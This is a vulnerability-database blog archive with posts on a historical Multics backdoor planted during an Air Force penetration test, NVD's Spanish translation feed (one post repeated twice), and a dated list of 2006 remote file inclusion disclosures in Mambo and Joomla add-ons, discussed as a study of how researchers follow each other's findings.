Category Archives: Vulnerability Sociology

Fascinating Vulnerability and Glimpse Into 33 Year Old Pen-Testing

Today, we pushed OSVDB 82447 which covers a backdoor in the Multics Operating System. For those not familiar with this old OS, there is an entire domain covering the fascinating history behind the development of Multics. OSVDB 82447 is titled “Multics Unspecified Third-party Backdoor” and gives an interesting insight into backdoors distributed by vendors. In this case, a third-party planted it, told the vendor, and Honeywell still distributed the operating system anyway. I encourage you to read the full paper by Lieutenant Colonel Roger R. Schell, a member of the tiger team that carried out the attack.

To summarize;

During a US Air Force sanctioned penetration test of mainframe computers, sometime before 1979, the tiger team ended up penetrating a Multics installation at Honeywell. In an account of what happened later, a paper said that the tiger team “modified the manufacturer’s master copy of the Multics operating system itself” and injected a backdoor. The backdoor code was described as being small, “fewer than 10 instructions out of 100,000″ and required a password for use. The report continues, saying that even though Honeywell was told it was there and how it worked, their technicians could not find it. Subsequently, the backdoor was distributed in future installations of Multics.

It would be interesting to know why Honeywell didn’t ask for, or didn’t receive, the specific modified code from the Air Force tiger team, and why they opted to distribute it to customers. Perhaps they thought if their own technicians couldn’t find the backdoor, no one else could. Even more interesting is why a tiger team was sanctioned to carry out a penetration test that not only gave them access to the “master copy” of Multics, but why they were allowed to actually place the backdoor there. When they heard Honeywell couldn’t find it, why didn’t they insist on ensuring it was removed before installation at customer locations? This brings a new twist to the ethics of penetration testing, at least in a historical context.

English is a Funny Language

NVD announced this week that they are now going to expand and provide vulnerability information in Spanish. I found this a bit amusing since OSVDB once thought that translating the database was a critical feature that needed to be delivered back in 2002. In fact, all of the language support was in the original OSVDB database schema and the backend code was created to handle it as we truly thought this would be implemented.

However, we quickly realized there were several issues with this concept including finding people to perform the translations! Additional concerns were raised as we spoke to more people in the security industry which included many conversations with non-US based security professionals (including a long ranting conversation with FX at Defcon). The critical concern was that much of the true meaning of the vulnerabilty is lost when the information is translated. The bottom line is that it was strongly believed that the vulnerability information in OSVDB should remain only in English.

OSVDB decided that we would not proceed any further with official plans to to translate the database, however, we have been contacted from other people that have wanted to translate OSVDB and we have provided permission to do so…

Here is a copy of the NVD announcement:

The National Vulnerability Database (NVD) is expanding to provide vulnerability translations. The first translation data feed is in Spanish and is being provided in cooperation with Inteco (http://www.inteco.es/), an entity of the Spanish government’s Ministry of Industry, Tourism, and Commerce (http://www.mityc.es/). Inteco is providing the translations and is solely responsible for the translation content. NVD is providing the translation infrastructure. The result of this cooperative effort is that NVD now contains an XML feed with 7,858 Spanish translations for the Common Vulnerabilities and Exposures (CVE) dictionary of security related software flaws. This feed will be maintained with translations for all new CVE vulnerabilities and, as with the other NVD data feeds, the data can be incorporated into commercial products and services with no licensing fees or restrictions. The translations are available through translation XML feeds at http://nvd.nist.gov/download.cfm#transxml.

We would love to hear any further thoughts (good and bad) on the value of translating vulnerability information into other languages.

English is a Funny Language

NVD announced this week that they are now going to expand and provide vulnerability information in Spanish. I found this a bit amusing since OSVDB once thought that translating the database was a critical feature that needed to be delivered back in 2002. In fact, all of the language support was in the original OSVDB database schema and the backend code was created to handle it as we truly thought this would be implemented.

However, we quickly realized there were several issues with this concept including finding people to perform the translations! Additional concerns were raised as we spoke to more people in the security industry which included many conversations with non-US based security professionals (including a long ranting conversation with FX at Defcon). The critical concern was that much of the true meaning of the vulnerabilty is lost when the information is translated. The bottom line is that it was strongly believed that the vulnerability information in OSVDB should remain only in English.

OSVDB decided that we would not proceed any further with official plans to to translate the database, however, we have been contacted from other people that have wanted to translate OSVDB and we have provided permission to do so…..

Here is a copy of the NVD announcement:

The National Vulnerability Database (NVD) is expanding to provide vulnerability translations. The first translation data feed is in Spanish and is being provided in cooperation with Inteco (http://www.inteco.es/), an entity of the Spanish government’s Ministry of Industry, Tourism, and Commerce (http://www.mityc.es/). Inteco is providing the translations and is solely responsible for the translation content. NVD is providing the translation infrastructure. The result of this cooperative effort is that NVD now contains an XML feed with 7,858 Spanish translations for the Common Vulnerabilities and Exposures (CVE) dictionary of security related software flaws. This feed will be maintained with translations for all new CVE vulnerabilities and, as with the other NVD data feeds, the data can be incorporated into commercial products and services with no licensing fees or restrictions. The translations are available through translation XML feeds at http://nvd.nist.gov/download.cfm#transxml.

We would love to hear any further thoughts (good and bad) on the value of translating vulnerability information into other languages.

Vulnerability Research Food Chain

I’ve mentioned the sociology aspect of the hacker, vuln researcher and security companies before, specifically how they interact, how one will influence another and more. The list of fun ideas I have on these topics is great, and maybe some day i’ll find the time to write more on them. In the mean time, this obvious one popped up and focuses on vulnerability researchers, how they find bugs, and how some feed off the work of others. We see this often where ResearcherA will find a vulnerability in one script, disclose the information, and ResearcherB will followup shortly after with the same type of vulnerability in a different script of the same product.

Recently we’ve seen a rash of remote file inclusion bugs in various add-ons to Mambo and Joomla. These add-ons are typically not written by the same developers nor are they distributed with the base installation of each product. However, they all seem to have one thing in common: “mosConfig_absolute_path” (or sometimes “absolute_path”). The same variable is being exploited in dozens of different add-ons and being found by different people. If we examine the chain of disclosure, can we see patterns in who consistently does followup research (low hanging fruit) instead of finding original vulnerabilities? Are there more observations in the way they are disclosed such as reporting to exploit sites vs Bugtraq or Full Disclosure? Are there misplaced signs of ego that accompany what amounts to trivial vulnerability finds while others are more modest and take it for what it is? Is it surprising that as people jump on the bandwagon, more and more reports end up being inaccurate and not a real vulnerability?

While skimming the list, strike-out text indicates the vulnerability has been disputed or proven false. The names of the researchers who didn’t fully check their find are in bold (and I’m curious if the other disclosures hold up under scrutiny). There is one occurrence of italics that potentially shows this type of “research” being used in the wild.

2006-08-21 bigAPE-Backup for Mambo – mdx
2006-08-20 Display MOSBot Manager for Mambo – O.U.T.L.A.W (Aria-security)
2006-08-20 EstateAgent for Mambo – O.U.T.L.A.W (Aria-security)
2006-08-19 CatalogShop for Mambo – O.U.T.L.A.W (Aria-security)
2006-08-18 Joomla x-shop – Crackers_Child
2006-08-18 Joomla Rssxt – Crackers_Child
2006-08-18 Kochsuite for Joomla – camino (Insecurity Research Team)
2006-08-18 mtg_myhomepage For Mambo – O.U.T.L.A.W (Aria-security)
2006-08-18 mambo-phphop Product Scroller – O.U.T.L.A.W (Aria-security)
2006-08-17 contentpublisher for Mambo – Crackers_Child
2006-08-17 MambelFish for Mambo – mdx
2006-08-17 JIM for Joomla – XORON
2006-08-17 mosListMessenger for Mambo – Crackers_Child
2006-08-17 anjel for Mambo – Crackers_Child
2006-08-16 Coppermine for Mambo – k1tk4t
2006-08-16 Reporter for Mambo – Crackers_Child
2006-08-16 com_lm for Mambo – Crackers_Child
2006-08-14 MMP for Mambo – mdx
2006-08-14 PeopleBook for Mambo – Matdhule
2006-08-10 Remository for Mambo – camino (Insecurity Research Team)
2006-08-07 JD-Wiki for Joomla – jank0 (hackbsd crew)
2006-07-31 Mambatstaff for Mambo – Dr.Jr7
2006-07-30 UHP for Mambo – Kurdish Security
2006-07-29 artlinks for Mambo – Dr.Jr7
2006-07-29 Colophon for Joomla – Drago84 (Exclusive Security Italian Security)
2006-07-28 Security Images for Joomla – Drago84
2006-07-28 MGM for Mambo – A-S-T TEAM
2006-07-28 Guestbook for Mambo – Matdhule
2006-07-24 PrinceClan Chess for Mambo – Tr_ZiNDaN
2006-07-20 MultiBanners for Mambo – Blue|Spy
2006-07-17 Mambo-SMF Forum – ASIANEAGLE
2006-07-17 VideoDB for Mambo – h4ntu (#batamhacker crew)
2006-07-17 LoudMouth for Mambo – h4ntu (#batamhacker crew)
2006-07-17 PollXT for Joomla – vitux
2006-07-17 Calendar for Mambo – Matdhule
2006-07-17 New Article for Mambo – Ahmad Maulana a.k.a Matdhule
2006-07-13 perForms for Joomla – “Vuln founded in a log file: lazy 0day!!! :D”
2006-07-12 Hashcash for Joomla – Ahmad Maulana a.k.a Matdhule
2006-07-12 SiteMap for Mambo – Ahmad Maulana a.k.a Matdhule
2006-07-12 HTMLArea3 for Mambo – Ahmad Maulana a.k.a Matdhule
2006-07-10 PccookBook for Mambo – Ahmad Maulana a.k.a Matdhule
2006-07-07 ExtCalendar for Mambo – Ahmad Maulana a.k.a Matdhule
2006-07-03 Galleria for Mambo – sikunYuk
2006-06-26 CBSMS Mambo Module – Kw3[R]Ln (Romanian Security Team)
2006-06-13 Jobline for Mambo – SpC-x

While all of this not necessarily useful to many, this line of research and observation is fascinating.

Follow

Get every new post delivered to your Inbox.

Join 4,759 other followers